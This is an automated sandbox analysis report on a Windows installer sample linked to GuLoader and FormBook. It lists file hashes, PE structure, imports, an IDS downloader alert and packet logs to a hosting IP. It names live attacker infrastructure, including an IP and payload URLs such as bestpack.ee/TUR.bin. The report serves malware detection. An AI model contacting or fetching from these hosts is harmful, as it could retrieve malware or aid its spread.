                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • VT rate limit hit for: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                    No simulations
Match:185.86.211.137
• Sample: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, Detection: malicious, Threat Name: FormBook, GuLoader, Context: bestpack.ee/TUR.bin
• Sample: UMOWA_PD.BAT.exe, Detection: malicious, Threat Name: FormBook, GuLoader, Context: bestpack.ee/POL.bin
Match:bestpack.ee
• Sample: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, Detection: malicious, Threat Name: FormBook, GuLoader, Context: 185.86.211.137
• Sample: UMOWA_PD.BAT.exe, Detection: malicious, Threat Name: FormBook, GuLoader, Context: 185.86.211.137
Match:TVHORADADAES
• Sample: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, Detection: malicious, Threat Name: FormBook, GuLoader, Context: 185.86.211.137
• Sample: UMOWA_PD.BAT.exe, Detection: malicious, Threat Name: FormBook, GuLoader, Context: 185.86.211.137
• Sample: http://glydesolar.com, Detection: malicious, Threat Name: Unknown, Context: 185.76.79.50
• Sample: http://fswcf.org, Detection: malicious, Threat Name: Unknown, Context: 185.76.79.50
• Sample: firmware.sh4.elf, Detection: malicious, Threat Name: Unknown, Context: 185.215.4.10
• Sample: nullnet_load.arm.elf, Detection: malicious, Threat Name: Mirai, Context: 156.67.60.67
• Sample: mpsl.elf, Detection: malicious, Threat Name: Mirai, Context: 185.204.65.51
• Sample: 77.90.35.9-skid.mpsl-2024-07-30T06_23_54.elf, Detection: malicious, Threat Name: Mirai, Moobot, Context: 156.67.60.67
• Sample: 0lMevtsZn2.elf, Detection: malicious, Threat Name: Mirai, Context: 156.67.60.35
• Sample: 205.185.120.123-skid.arm5-2024-07-27T10_33_41.elf, Detection: malicious, Threat Name: Mirai, Moobot, Context: 156.67.60.47
Match:37f463bf4616ecd445d4a1937da06e19
• Sample: Cortex.exe, Detection: malicious, Threat Name: Unknown, Context: 185.86.211.137
• Sample: Cortex.exe, Detection: malicious, Threat Name: Unknown, Context: 185.86.211.137
• Sample: file.exe, Detection: malicious, Threat Name: CredGrabber, Meduza Stealer, Context: 185.86.211.137
• Sample: file.exe, Detection: malicious, Threat Name: CredGrabber, Meduza Stealer, Context: 185.86.211.137
• Sample: file.exe, Detection: malicious, Threat Name: CredGrabber, Meduza Stealer, Context: 185.86.211.137
• Sample: file.exe, Detection: malicious, Threat Name: CredGrabber, Meduza Stealer, Context: 185.86.211.137
• Sample: file.exe, Detection: malicious, Threat Name: LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Context: 185.86.211.137
• Sample: mSLEwIfTGL.exe, Detection: malicious, Threat Name: CredGrabber, Meduza Stealer, Context: 185.86.211.137
• Sample: #docs_8299010377388200191-pdf.js, Detection: malicious, Threat Name: Snake Keylogger, VIP Keylogger, Context: 185.86.211.137
• Sample: 175-33-26-24.HTA.hta, Detection: malicious, Threat Name: Unknown, Context: 185.86.211.137
Match:C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll
• Sample: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, Detection: malicious, Threat Name: FormBook, GuLoader
• Sample: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, Detection: malicious, Threat Name: GuLoader
• Sample: UMOWA_PD.BAT.exe, Detection: malicious, Threat Name: FormBook, GuLoader
• Sample: UMOWA_PD.BAT.exe, Detection: malicious, Threat Name: GuLoader
• Sample: Payment_Advice.1.bat.exe, Detection: malicious, Threat Name: FormBook, GuLoader
• Sample: Payment_Advice..exe, Detection: malicious, Threat Name: FormBook, GuLoader
• Sample: Payment_Advice..exe, Detection: malicious, Threat Name: GuLoader
• Sample: Payment_Advice.1.bat.exe, Detection: malicious, Threat Name: GuLoader
• Sample: Payment_Advice..exe, Detection: malicious, Threat Name: GuLoader
                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):12288
                                                                                                                      Entropy (8bit):5.805604762622714
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:VjHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZv0QPi:B/Qlt7wiij/lMRv/9V4bvr
                                                                                                                      MD5:4ADD245D4BA34B04F213409BFE504C07
                                                                                                                      SHA1:EF756D6581D70E87D58CC4982E3F4D18E0EA5B09
                                                                                                                      SHA-256:9111099EFE9D5C9B391DC132B2FAF0A3851A760D4106D5368E30AC744EB42706
                                                                                                                      SHA-512:1BD260CABE5EA3CEFBBC675162F30092AB157893510F45A1B571489E03EBB2903C55F64F89812754D3FE03C8F10012B8078D1261A7E73AC1F87C82F714BCE03D
                                                                                                                      Malicious:false
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Joe Sandbox View:
• Filename: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, Detection: malicious
• Filename: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, Detection: malicious
• Filename: UMOWA_PD.BAT.exe, Detection: malicious
• Filename: UMOWA_PD.BAT.exe, Detection: malicious
• Filename: Payment_Advice.1.bat.exe, Detection: malicious
• Filename: Payment_Advice..exe, Detection: malicious
• Filename: Payment_Advice..exe, Detection: malicious
• Filename: Payment_Advice.1.bat.exe, Detection: malicious
• Filename: Payment_Advice..exe, Detection: malicious
                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):146048
                                                                                                                      Entropy (8bit):4.6065779762897
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:LL9Fdl//kBP5+LtQdILRCc2U02fKGNMYqCAKNN06YV1e4iHHgGtyH3aYV0fo:3Fl++Ltt2GNxqCdNW6i18rtyH3ao
                                                                                                                      MD5:5AF6DF202041C4BFCCFFFC8A316C9A1A
                                                                                                                      SHA1:D9F6883DAE12C9E3DFA4A60B5CC4A231481A38B5
                                                                                                                      SHA-256:72820F9E966138202338EE85EF716A4352A9624FA5F4E42900C8B08C2FC39865
                                                                                                                      SHA-512:BB04146B10189062AA39507952BA1588FA20B21D9B817F889D42BAC22E54F810D1099F63484F309D4A51532FB34DDFF93101197224FC189F1FDA79105001125E
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):337530
                                                                                                                      Entropy (8bit):7.652545988590635
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:PF4NYyYBqXrQZimSkrb1nbm7WbwuZO/NoeWUejQfeT+0hvTT8LOdhkvwx:PFAYE00mSupSgO1duQ2vvH8LOd+wx
                                                                                                                      MD5:B9511C05839C7DE7AA19DC47A1E0A224
                                                                                                                      SHA1:BC9DDA4E870DAEE63244689DD42AB4E34BB676AD
                                                                                                                      SHA-256:DCE2C8C92DB5C0E6CBE667BA1FA4DF04465099C45478CD84ED93B5DCDBEB91C8
                                                                                                                      SHA-512:CFEA992238154FBD6C29C788CF79987E863E93ECC04A814F6B94F91E1DA5908EC337FE3786D1488E0DB2A23A71B1F487F606D760E1D223D5FDAC4D2BA1D01E54
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):97664
                                                                                                                      Entropy (8bit):1.2371741628878217
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:XEFQJPKWWG5ARWTJqBshVmdboj6UJY3VBCwYw2ZDRnv+mRQN:XUE/m2O3N
                                                                                                                      MD5:2B4D5FD79400969869ED030F4803BE99
                                                                                                                      SHA1:163C23302E2DA2B2265A7CD7ED08BE16A3853DCA
                                                                                                                      SHA-256:49C47AAA67085C8B38D02DC0F1F792E83FA17D41CE16927888C9085F530E9DB4
                                                                                                                      SHA-512:7EE103CCCC54B148E7AD62F37FF4ACFC4438436C6F75D15E5248CB19643348C70F2B63062712817002CE4D173E51A7A0C8B3851FCD0FC0D6E1302838909B1C2D
                                                                                                                      Malicious:false
                                                                                                                      Reputation:low
                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):244138
                                                                                                                      Entropy (8bit):1.252663089946015
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:cv49C5wBVa5O2Fx8p7KLOTSo3NTuAG15VTvfAX+H7v+uQVsfpqSC26Pn6DD/SNsg:JBQxurv96jREO3X2r
                                                                                                                      MD5:BBD77A921062C9B6CBF4BEDFF50E1514
                                                                                                                      SHA1:C25712C5F69E016A364E8898B59E7229E3C5E7A4
                                                                                                                      SHA-256:E2882B3589FF6D9FA79AC2D88FC8DE8FD94BA046E8B9796203A4916C73731EAD
                                                                                                                      SHA-512:9BDFC20EFFD587EC19B524E36D392F4863C8242C8D4C8C7F81164A0E0DF84C5BF1633400873D0F68C40079113F9F2568706642334FCFDCCE4C6E0B1D7D5FB660
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):438128
                                                                                                                      Entropy (8bit):1.2562406175237242
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:zN/79C7p5KmH/e6grFLDiN8w27kdDZK5M9aR:hyp5K4e6kFLoMV
                                                                                                                      MD5:E883CEF7CF2793E15A52C9BAC1CDE472
                                                                                                                      SHA1:1D4973110569354FA072BA3AFF0BD21EA0DF109A
                                                                                                                      SHA-256:2FF67336CFEEE418E565B0C79855927FC0CD0B1E9F2F40A59F1CB7EF2328635A
                                                                                                                      SHA-512:372BE015C3FA19C0EEAA981803900CA088B92188187A69697EEE808068F8033225BFD2927E2DB54EABEECAC05A421DC6CCCABFE19F39788B4F6D4E6F80CE04A5
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):15722
                                                                                                                      Entropy (8bit):1.1774803541140593
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:QlmaSsDp47EcNFpMw8GM4Zq+AUUnPMN61WN1:QbSc47/lv8n4Zq+AUQmy4
                                                                                                                      MD5:A8FD81B22FDC76D0AAE4ABF40CC1E8F4
                                                                                                                      SHA1:ECA25609E68636E12C3AB63D7E9F1B7717CE450A
                                                                                                                      SHA-256:13148F74A847C0F474385F1E62C01A5065700A472BF689D7299D3F420A7CC45D
                                                                                                                      SHA-512:7E0CE6444E0F402278704066AE74F442684B80959CB90CFABA6A3BBCA1EB754EEBCDE11A61FE17D8DE1F708F035BDC2C7825BF9E8F92D761CE0E78BA68544C6B
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      File Type:data
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):38361
                                                                                                                      Entropy (8bit):1.2166387306020765
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:X+F+sq/qAweG+1AI4KbEElQxRqKJOPOXALDW3uYBspm5NfXDZ9:X6M/l17oEnYjP
                                                                                                                      MD5:2BF0CAC964058C5B0D73930FC7412775
                                                                                                                      SHA1:003BEC59CB10BDD8B5B760C14DB899637E85AFBE
                                                                                                                      SHA-256:5A823D12E477927D5133F5B4DE1A5BCB0973FDBBDC4C966C821928CB439FC97A
                                                                                                                      SHA-512:303CF2DE6CFC652A10E543E0F6484097042234C786624F1B67668CA254B03DE2CCF4D7EB0FB6E13172F605B1B4B742D8694CF3549952523753C5DDE741975564
                                                                                                                      Malicious:false
                                                                                                                      Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):434
                                                                                                                      Entropy (8bit):4.305884836882498
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:mBX7vwwJDXCuNQLIU/0vkxuYAz8/p7QTrYSCmDEIHlwq+:mBXUWEzR7ylCeEUw
                                                                                                                      MD5:3F6632F26EBA2C111F54C97312D4C4EA
                                                                                                                      SHA1:8D3FB7505058C8C5CB22133C77213D6B37CDD5F9
                                                                                                                      SHA-256:CE8824C6205F36A17C4476BF02839F065009CD15E88970E653CE5F6A89BD9954
                                                                                                                      SHA-512:EED0879B222E9F074C109B2FA8548F441AD1A4C1CEF8EDB3BAE6D05308E2916061F2A2835E9252A2EDE27608435E40E8C52849B9DD8D38A5FBBEC995628D28E7
                                                                                                                      Malicious:false
                                                                                                                      Preview:kumquat equilibrious invector occludes vesteuroperen knippelfines,laparosplenotomy subagents skatkisternes sovehjertet angiospermous abastard caprate efterbyrdens exercised organisationsliniens puberties..ansvarhavendes unhumidified fordjelsesproces forureningsomraades,nondivisive famle illicitly lithophone lattins cubit rougens svmmebrillerne..untestamental transect subfestively subserviently hyldevarer.maaske pastoral overlooks,
                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                      Entropy (8bit):7.956957743632461
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe
                                                                                                                      File size:559'533 bytes
                                                                                                                      MD5:09646b466d4203f0a605120c10248654
                                                                                                                      SHA1:e1f6e1bec33b598963a6e017d41e28b72a6e9bbd
                                                                                                                      SHA256:7110772ac28b158130afc68ae0f00bdca6832cc826f7f2fbf38fd373feb16b2f
                                                                                                                      SHA512:74414f447846f9a51a381a30ab6d08b66cf68f8fcc2ee42ce0fdf41e4914c4dc2b4ab5bd26d85e71f92e3d0ce7badb274ec68973a74506caca26f60d60d80f24
                                                                                                                      SSDEEP:12288:qX69L27aMq4PfZ6Vt1wFHLesCqew8wmjAjPJbbiEUW34/:qX69Ln4Pfc9whLTCkmUjBqEUW
                                                                                                                      TLSH:13C42343B870D6ABFA651334563683A98AFD7C210291339F2F44BF6EB9289C5D91D343
                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...c..d.................f...".....
                                                                                                                      Icon Hash:9193c9a1858b8db5
                                                                                                                      Entrypoint:0x4034fc
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                      Time Stamp:0x64A0DC63 [Sun Jul 2 02:09:39 2023 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:4
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:4
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:4
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                                                                                                      Instruction
                                                                                                                      sub esp, 000003F8h
                                                                                                                      push ebp
                                                                                                                      push esi
                                                                                                                      push edi
                                                                                                                      push 00000020h
                                                                                                                      pop edi
                                                                                                                      xor ebp, ebp
                                                                                                                      push 00008001h
                                                                                                                      mov dword ptr [esp+20h], ebp
                                                                                                                      mov dword ptr [esp+18h], 0040A2D8h
                                                                                                                      mov dword ptr [esp+14h], ebp
                                                                                                                      call dword ptr [004080A4h]
                                                                                                                      mov esi, dword ptr [004080A8h]
                                                                                                                      lea eax, dword ptr [esp+34h]
                                                                                                                      push eax
                                                                                                                      mov dword ptr [esp+4Ch], ebp
                                                                                                                      mov dword ptr [esp+0000014Ch], ebp
                                                                                                                      mov dword ptr [esp+00000150h], ebp
                                                                                                                      mov dword ptr [esp+38h], 0000011Ch
                                                                                                                      call esi
                                                                                                                      test eax, eax
                                                                                                                      jne 00007FD5BCCF916Ah
                                                                                                                      lea eax, dword ptr [esp+34h]
                                                                                                                      mov dword ptr [esp+34h], 00000114h
                                                                                                                      push eax
                                                                                                                      call esi
                                                                                                                      mov ax, word ptr [esp+48h]
                                                                                                                      mov ecx, dword ptr [esp+62h]
                                                                                                                      sub ax, 00000053h
                                                                                                                      add ecx, FFFFFFD0h
                                                                                                                      neg ax
                                                                                                                      sbb eax, eax
                                                                                                                      mov byte ptr [esp+0000014Eh], 00000004h
                                                                                                                      not eax
                                                                                                                      and eax, ecx
                                                                                                                      mov word ptr [esp+00000148h], ax
                                                                                                                      cmp dword ptr [esp+38h], 0Ah
                                                                                                                      jnc 00007FD5BCCF9138h
                                                                                                                      and word ptr [esp+42h], 0000h
                                                                                                                      mov eax, dword ptr [esp+40h]
                                                                                                                      movzx ecx, byte ptr [esp+3Ch]
                                                                                                                      mov dword ptr [00429AD8h], eax
                                                                                                                      xor eax, eax
                                                                                                                      mov ah, byte ptr [esp+38h]
                                                                                                                      movzx eax, ax
                                                                                                                      or eax, ecx
                                                                                                                      xor ecx, ecx
                                                                                                                      mov ch, byte ptr [esp+00000148h]
                                                                                                                      movzx ecx, cx
                                                                                                                      shl eax, 10h
                                                                                                                      or eax, ecx
                                                                                                                      movzx ecx, byte ptr [esp+0000004Eh]
                                                                                                                      Programming Language:
                                                                                                                      • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4c000 | 0x3440 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2a8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6556 | 0x6600 | dd25e171f2e0fe45f2800cc9e162537d | False | 0.6652113970588235 | data | 6.456753840355455 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x1358 | 0x1400 | f0b500ff912dda10f31f36da3efc8a1e | False | 0.44296875 | data | 5.102094016108248 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x1fb38 | 0x600 | 2bc02714ee74ba781d92e94eeaccb080 | False | 0.501953125 | data | 4.040639308682379 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2a000 | 0x22000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4c000 | 0x3440 | 0x3600 | 5950a4e36f0f510396fb34e6e03b573a | False | 0.5579427083333334 | data | 5.567094918094419 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x4c2f8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2688 | English | United States | 0.7190831556503199
RT_ICON | 0x4d1a0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.7035198555956679
RT_ICON | 0x4da48 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1536 | English | United States | 0.33963414634146344
RT_ICON | 0x4e0b0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | United States | 0.6423410404624278
RT_ICON | 0x4e618 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.39381720430107525
RT_ICON | 0x4e900 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.5101351351351351
RT_DIALOG | 0x4ea28 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x4eb28 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x4ec48 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x4ed10 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x4ed70 | 0x5a | data | English | United States | 0.7111111111111111
RT_VERSION | 0x4edd0 | 0x248 | data | English | United States | 0.4811643835616438
RT_MANIFEST | 0x4f018 | 0x423 | XML 1.0 document, ASCII text, with very long lines (1059), with no line terminators | English | United States | 0.5127478753541076
DLL | Import
ADVAPI32.dll | RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll | SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll | CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll | ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll | MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll | GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll | lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-27T18:58:47.751610+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.11.20 | 49760 | 185.86.211.137 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                      Sep 27, 2024 18:59:09.195498943 CEST4976280192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 18:59:10.120748043 CEST4976280192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 18:59:10.121071100 CEST4976480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 18:59:10.338175058 CEST8049762185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 18:59:10.338238001 CEST8049764185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 18:59:10.338516951 CEST4976480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 18:59:10.338602066 CEST4976480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 18:59:10.555641890 CEST8049764185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 18:59:10.556744099 CEST8049764185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 18:59:10.556905985 CEST4976480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 18:59:10.557332993 CEST49765443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 18:59:10.557367086 CEST44349765185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 18:59:10.557526112 CEST49765443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 18:59:10.557789087 CEST49765443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 18:59:10.557807922 CEST44349765185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 18:59:11.002126932 CEST44349765185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 18:59:11.002307892 CEST49765443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 18:59:11.002629042 CEST49765443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 18:59:11.002664089 CEST44349765185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 18:59:11.002759933 CEST49765443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 18:59:11.002819061 CEST44349765185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 18:59:11.447926044 CEST44349765185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 18:59:11.448163033 CEST49765443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 18:59:11.448169947 CEST44349765185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 18:59:11.448410034 CEST49765443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 18:59:11.448566914 CEST49765443192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 18:59:11.448647976 CEST44349765185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 18:59:20.567159891 CEST8049764185.86.211.137192.168.11.20
                                                                                                                      Sep 27, 2024 18:59:20.567472935 CEST4976480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 18:59:21.493242025 CEST4976480192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 18:59:21.493808031 CEST4976680192.168.11.20185.86.211.137
                                                                                                                      Sep 27, 2024 18:59:21.710658073 CEST8049764185.86.211.137192.168.11.20
